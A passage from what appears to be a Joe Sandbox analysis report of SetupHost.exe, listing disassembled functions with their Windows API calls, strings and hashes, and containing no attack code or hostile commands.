                                                                                                                        • Instruction Fuzzy Hash: 91615074B4122C8BDB259F65CD81BFD72B5EB48744F1040EEEA09AB351DA789E84CF48
                                                                                                                        Function 0054AF3C Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 177memoryregistryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • memset.MSVCRT ref: 0054AF95
                                                                                                                          • Part of subcall function 0054AA94: LoadLibraryExW.KERNEL32(ntdll.dll,00000000,00000800,00000001,0054AFA2,00000000,00000001,00000001), ref: 0054AAA3
                                                                                                                          • Part of subcall function 0054AA94: GetProcAddress.KERNEL32(00000000,RtlIsStateSeparationEnabled), ref: 0054AAB3
                                                                                                                        • RegOpenKeyExW.KERNEL32(80000002,?,00000000,00020019,?,00000000,00000001,00000001), ref: 0054AFF5
                                                                                                                        • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0054B03D
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0054B06A
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0054B071
                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0054B0B9
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000001,00000001), ref: 0054B17C
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0054B183
                                                                                                                        • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000001), ref: 0054B198
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$AddressAllocCloseEnumFreeInfoLibraryLoadOpenProcQuerymemset
                                                                                                                        • String ID: \Users
                                                                                                                        • API String ID: 3246958429-3656258783
                                                                                                                        • Opcode ID: 605280ad105044e195728f2146cd13c97eaac52e38f9ffe934104b217f4002e7
                                                                                                                        • Instruction ID: 1910a23ec575a6160baa5701f8760e426ca2552b0eae66b0df4ef0ef1563527d
                                                                                                                        • Opcode Fuzzy Hash: 605280ad105044e195728f2146cd13c97eaac52e38f9ffe934104b217f4002e7
                                                                                                                        • Instruction Fuzzy Hash: CB51B076C41239ABEB219B64DC9DBDEBBB4BB18705F1001D9E909A7251D7349E80CFA0
                                                                                                                        Function 00540CAA Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 111memorywindowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32 ref: 00540CCF
                                                                                                                        • FormatMessageW.KERNEL32(00000900,00000000,00000400,00000000,00000000,?), ref: 00540D24
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00540D55
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00540D5C
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,ConstructPartialMsgVW: MALLOC failed,?), ref: 00540DA8
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00540DAF
                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,ConstructPartialMsgVW: MALLOC failed,?), ref: 00540DBE
                                                                                                                        • SetLastError.KERNEL32(?), ref: 00540DD2
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$ErrorFreeLastProcess$AllocFormatLocalMessage
                                                                                                                        • String ID: ConstructPartialMsgVW: MALLOC failed$Log: Failed To Get Msg From ID
                                                                                                                        • API String ID: 804065711-4092388093
                                                                                                                        • Opcode ID: 95e21946745c627086a538e13430b63de2550fdbee86cdaf72d95589c0d61540
                                                                                                                        • Instruction ID: 05b59c0f46367b6926ae5fd61ce91a862142feb8a3a29de89d9468f263052643
                                                                                                                        • Opcode Fuzzy Hash: 95e21946745c627086a538e13430b63de2550fdbee86cdaf72d95589c0d61540
                                                                                                                        • Instruction Fuzzy Hash: 8B31C336A04304ABD7059FE4DC58BEA7BB9FF58319F245429FA05D72A0D7349D08EB14
                                                                                                                        Function 0054A1E5 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 105memoryregistryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004FE595: _vsnwprintf.MSVCRT ref: 004FE5C7
                                                                                                                        • RegGetValueW.KERNEL32(80000002,?,ETag,00000002,00000000,00000000,00000000,?,?,?,00000001,00000000,00000000), ref: 0054A260
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,-0000001E,?,?,?,00000001,00000000,00000000), ref: 0054A28C
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,00000001,00000000,00000000), ref: 0054A293
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 0054A30E
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 0054A315
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$AllocFreeValue_vsnwprintf
                                                                                                                        • String ID: %ls\%ls\%ls$ETag
                                                                                                                        • API String ID: 4126488486-4233363893
                                                                                                                        • Opcode ID: 130e3b98e65d67f5bd11c03b166bf18f3e1ab6bff751e9f111d818bbeaead1c9
                                                                                                                        • Instruction ID: 71ec77b30ba9375a133bb049bb147e246f513846a74f1a1c7d3e6c7f151b1e4f
                                                                                                                        • Opcode Fuzzy Hash: 130e3b98e65d67f5bd11c03b166bf18f3e1ab6bff751e9f111d818bbeaead1c9
                                                                                                                        • Instruction Fuzzy Hash: CE31E57698032DABC7208B518C4CFEF7BBCFB98715F110196F909E7241DA709E448BA1
                                                                                                                        Function 004E34A0 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 93threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(00000000,00000000), ref: 004E3522
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 004E35A1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentErrorLastThread
                                                                                                                        • String ID: %s, LOG: [0x%X] [%s] [%s]$CSetupDiagnostics::LogString$ERROR$INFO$WARNING$base\ntsetup\conx\mosetup\setuphost\DiagnosticsImpl.h
                                                                                                                        • API String ID: 1800743499-698197140
                                                                                                                        • Opcode ID: f50c22238bc6ab2b39f9d4617c0776916f76092659f5694536888c1a1dd9ec04
                                                                                                                        • Instruction ID: 1c79147e437f50940c6c12c61228325b88719b28e02be62af87da2c43dae0872
                                                                                                                        • Opcode Fuzzy Hash: f50c22238bc6ab2b39f9d4617c0776916f76092659f5694536888c1a1dd9ec04
                                                                                                                        • Instruction Fuzzy Hash: 05212132604340BBC712AF66990DA3B7BA5ABC531AF10452FF5184B341D739CE04879A
                                                                                                                        Function 004E695A Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 76COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • CSystemHelper::ThreadExecute, xrefs: 004E6A0C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorEventLast
                                                                                                                        • String ID: CSystemHelper::ThreadExecute
                                                                                                                        • API String ID: 3848097054-703347033
                                                                                                                        • Opcode ID: a64855c5b7b49c29481141c9c3c8085d44f460152700a5a8a77a0f3b3f1b0f89
                                                                                                                        • Instruction ID: 1c78e156aec5af61057cd47c89aacb3a437928c20d77a3fd613aadc878a105c2
                                                                                                                        • Opcode Fuzzy Hash: a64855c5b7b49c29481141c9c3c8085d44f460152700a5a8a77a0f3b3f1b0f89
                                                                                                                        • Instruction Fuzzy Hash: 1D210431704348ABCB006F72DC9896ABBA8FF58762F11442BFA05C7242DB38DC04DB99
                                                                                                                        Function 005404A9 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 60registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • memset.MSVCRT ref: 005404D0
                                                                                                                        • RegOpenKeyExW.KERNEL32(80000002,SYSTEM\Setup\Panther,00000000,00020019,?,?,02000000,65000000), ref: 005404FB
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,TelemetryAssertList,00000000,00000000,?,?,?,02000000,65000000), ref: 00540520
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,02000000,65000000), ref: 00540531
                                                                                                                        • GetEnvironmentVariableW.KERNEL32(PANTHER_ENABLE_TELASSERT,?,00000104,?,02000000,65000000), ref: 0054054C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseEnvironmentOpenQueryValueVariablememset
                                                                                                                        • String ID: PANTHER_ENABLE_TELASSERT$SYSTEM\Setup\Panther$TelemetryAssertList
                                                                                                                        • API String ID: 3483029746-3368635653
                                                                                                                        • Opcode ID: 5b00f3f40572d0608871a9cc3722e65aa3dde2c9a85246652b430807988a7931
                                                                                                                        • Instruction ID: 57239512d7d4fc70543b3bf540d802b1152ae7767600ecf4de2f6ab0c7f907db
                                                                                                                        • Opcode Fuzzy Hash: 5b00f3f40572d0608871a9cc3722e65aa3dde2c9a85246652b430807988a7931
                                                                                                                        • Instruction Fuzzy Hash: A4119070A4122CABDB30AB22DC4DEDBBFBCFB54754F1001A6B508A2190D7709A44DEA0
                                                                                                                        Function 005489AA Relevance: 13.7, APIs: 9, Instructions: 169synchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ImpersonateLoggedOnUser.ADVAPI32(?,?,?,?,00000000,00000000,00000000), ref: 00548A51
                                                                                                                        • WinHttpSetCredentials.WINHTTP(?,00000001,00000001,?,?,00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00548AB8
                                                                                                                        • RevertToSelf.ADVAPI32(?,?,?,?,?), ref: 00548AD9
                                                                                                                          • Part of subcall function 00548F32: WTSGetActiveConsoleSessionId.KERNEL32(?,00000001,00000000,00000001,00000000,00000000,00000001,00000000), ref: 00548F42
                                                                                                                          • Part of subcall function 00548F32: WTSQueryUserToken.WTSAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00548EE3), ref: 00548F63
                                                                                                                          • Part of subcall function 00548F32: WTSEnumerateSessionsW.WTSAPI32(00000000,00000000,00000001,?,?), ref: 00548F79
                                                                                                                          • Part of subcall function 00548F32: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00548EE3,00000001,00000000), ref: 00548F83
                                                                                                                          • Part of subcall function 00548F32: CloseHandle.KERNEL32(00000000), ref: 00548FFE
                                                                                                                          • Part of subcall function 00548F32: WTSFreeMemory.WTSAPI32(?), ref: 0054900D
                                                                                                                        • GetLastError.KERNEL32 ref: 00548B1B
                                                                                                                        • GetLastError.KERNEL32 ref: 00548B3B
                                                                                                                        • ExitProcess.KERNEL32 ref: 00548B42
                                                                                                                        • RevertToSelf.ADVAPI32(00000000,00000000), ref: 00548B81
                                                                                                                        • ReleaseMutex.KERNEL32(00000000,00000000,00000000), ref: 00548B90
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00548B97
                                                                                                                          • Part of subcall function 0054A619: CreateMutexW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000001), ref: 0054A66A
                                                                                                                          • Part of subcall function 0054A619: WaitForSingleObject.KERNEL32(00000000,0000EA60,?,?,?,?,?,00000001), ref: 0054A67C
                                                                                                                          • Part of subcall function 00549C98: RegGetValueW.KERNEL32(80000002,?,RefreshAfter,00000048,00000000,?,00000008,?,?,?,00000001,00000001,00000000), ref: 00549D41
                                                                                                                          • Part of subcall function 00549C98: RegGetValueW.ADVAPI32(80000002,?,RefreshInterval,00000018,00000000,0000000D,00000004,?,?,?,00000001,00000001,00000000), ref: 00549D6B
                                                                                                                          • Part of subcall function 00549C98: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,00000001,00000001,00000000), ref: 00549D96
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$CloseHandleMutexRevertSelfTimeUserValue$ActiveConsoleCreateCredentialsEnumerateExitFileFreeHttpImpersonateLoggedMemoryObjectProcessQueryReleaseSessionSessionsSingleSystemTokenWait
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 729768055-0
                                                                                                                        • Opcode ID: b8aaf182114f112d0f14f0a0274c895862710fc2ce2f8ffbaf02f9a47d0e87b9
                                                                                                                        • Instruction ID: c38c180d04987c77bdc8c78175b75088fcf493a64e9e343beabcc096c242a6b6
                                                                                                                        • Opcode Fuzzy Hash: b8aaf182114f112d0f14f0a0274c895862710fc2ce2f8ffbaf02f9a47d0e87b9
                                                                                                                        • Instruction Fuzzy Hash: 465106726083529BC721EF6198985FFBFD5BBC4318F09091EF88597241DF20CD0997A2
                                                                                                                        Function 004FB583 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 87memoryregistryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004FC6D3: RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?,00000000,80000002,80000002,?,004FB5A2,?,00000000,?), ref: 004FC6F0
                                                                                                                          • Part of subcall function 004FC6D3: RegCloseKey.ADVAPI32(00000000,004FB5A2,?,00000000,?), ref: 004FC72B
                                                                                                                        • RegQueryValueExW.KERNEL32(00000000,BuildLabEx,00000000,?,00000000,00000000,?,00000000,?), ref: 004FB5C6
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,?), ref: 004FB5E7
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000000,?), ref: 004FB5EE
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,?), ref: 004FB64E
                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000000,?), ref: 004FB655
                                                                                                                        • RegCloseKey.KERNEL32(00000000,?,00000000,?), ref: 004FB664
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$CloseProcess$AllocFreeOpenQueryValue
                                                                                                                        • String ID: BuildLabEx
                                                                                                                        • API String ID: 3475947390-1430032658
                                                                                                                        • Opcode ID: 3f85d064052faa8c82ad2e26d1cc4e717124444d5a04e12f82f5d16def312461
                                                                                                                        • Instruction ID: bf24d7be62b875dd16fba701fe3362e8187df305b6bdc9fcb365167088e6d730
                                                                                                                        • Opcode Fuzzy Hash: 3f85d064052faa8c82ad2e26d1cc4e717124444d5a04e12f82f5d16def312461
                                                                                                                        • Instruction Fuzzy Hash: E3219531A0431DEBEB119FA5D898BBFB679EB05305F10416FEA01D2251CB788E059FD5
                                                                                                                        Function 00548E40 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 87COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • memset.MSVCRT ref: 00548E77
                                                                                                                        • WinHttpOpen.WINHTTP(OneSettingsQuery,00000000,00000000,00000000,00000000,00000001,00000001,00000000), ref: 00548E9A
                                                                                                                        • GetLastError.KERNEL32 ref: 00548EA6
                                                                                                                        • WinHttpConnect.WINHTTP(00000000,00000000,000001BB,00000000), ref: 00548EC3
                                                                                                                        • WinHttpOpenRequest.WINHTTP(?,GET,?,00000000,00000000,00000000,00800000,?,?,00000001,00000000,00000000,00000000,?,?), ref: 00548F0F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Http$Open$ConnectErrorLastRequestmemset
                                                                                                                        • String ID: GET$OneSettingsQuery
                                                                                                                        • API String ID: 1858633897-231841399
                                                                                                                        • Opcode ID: 281aed3a725892ddbddb6a29f69357912a3e179bda886667b73bc384b1b0642a
                                                                                                                        • Instruction ID: cc92e7cbb6c0de66420467218f9574a58dd02ab0be2c7ca0236c27f5ff055161
                                                                                                                        • Opcode Fuzzy Hash: 281aed3a725892ddbddb6a29f69357912a3e179bda886667b73bc384b1b0642a
                                                                                                                        • Instruction Fuzzy Hash: F72183B5600319FBDB209F65CC5AFBB7BADFB48704F00446ABA05E3250DA70DD488B64
                                                                                                                        Function 0054D245 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 60COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 0054D24C
                                                                                                                        • GetNativeSystemInfo.KERNEL32(?,0000002C,0054DDC5,00000030,0054DF7C,?,?,00000000,00000000,?,00000050,0053E322,?,?,?), ref: 0054D277
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3_InfoNativeSystem
                                                                                                                        • String ID: amd64$arm$arm64$ia64$x86
                                                                                                                        • API String ID: 1414440993-1770253632
                                                                                                                        • Opcode ID: 2e86235828861fb831a49a317e0ae51cabf39bc22556de77fb06228f810041dd
                                                                                                                        • Instruction ID: 4fce056454c0e9b60c402df5f58e942246354b224bca98c6bffc09e1c483b1bb
                                                                                                                        • Opcode Fuzzy Hash: 2e86235828861fb831a49a317e0ae51cabf39bc22556de77fb06228f810041dd
                                                                                                                        • Instruction Fuzzy Hash: 9311B63AB0821997CB19DAA8D5587FC7E71FF40719F14451EE5029B284CBACCD40D368
                                                                                                                        Function 00542208 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 30memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FreeSid.ADVAPI32(00000000,005421D3,?,00000001,00552740,0000003C), ref: 00542211
                                                                                                                        • FreeSid.ADVAPI32(00000000,005421D3,?,00000001,00552740), ref: 00542223
                                                                                                                        • FreeSid.ADVAPI32(00000000,005421D3,?,00000001,00552740), ref: 00542235
                                                                                                                        • CloseHandle.KERNEL32(@'U,005421D3,?,00000001,00552740), ref: 00542246
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,005421D3,?,00000001,00552740), ref: 00542255
                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000001,00552740), ref: 0054225C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Free$Heap$CloseHandleProcess
                                                                                                                        • String ID: @'U
                                                                                                                        • API String ID: 2806346229-1310671820
                                                                                                                        • Opcode ID: f9ecf2b1516194ff3b6d0df4cc574ba9cee43d6edd79a3d3a3756e9feff927eb
                                                                                                                        • Instruction ID: 04f733219f0481675133acc1a3af3ce78b7f41f52efaf12d6d4a1eff3fa295b7
                                                                                                                        • Opcode Fuzzy Hash: f9ecf2b1516194ff3b6d0df4cc574ba9cee43d6edd79a3d3a3756e9feff927eb
                                                                                                                        • Instruction Fuzzy Hash: 1FF07F79C08318EBCB119FA5E89CADDBEB5BF6C716F545028F415B22A0C7745888EF20
                                                                                                                        Function 00548F32 Relevance: 12.1, APIs: 8, Instructions: 86COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • WTSGetActiveConsoleSessionId.KERNEL32(?,00000001,00000000,00000001,00000000,00000000,00000001,00000000), ref: 00548F42
                                                                                                                        • WTSQueryUserToken.WTSAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00548EE3), ref: 00548F63
                                                                                                                        • WTSEnumerateSessionsW.WTSAPI32(00000000,00000000,00000001,?,?), ref: 00548F79
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00548EE3,00000001,00000000), ref: 00548F83
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00548EE3,00000001), ref: 00548FB5
                                                                                                                        • WTSQueryUserToken.WTSAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00548EE3), ref: 00548FC8
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00548FFE
                                                                                                                        • WTSFreeMemory.WTSAPI32(?), ref: 0054900D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandleQueryTokenUser$ActiveConsoleEnumerateErrorFreeLastMemorySessionSessions
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3370614215-0
                                                                                                                        • Opcode ID: 111176b624cad8123a660f3cd5ab0c0cfe4106deaff22d8e57089fc2347a2523
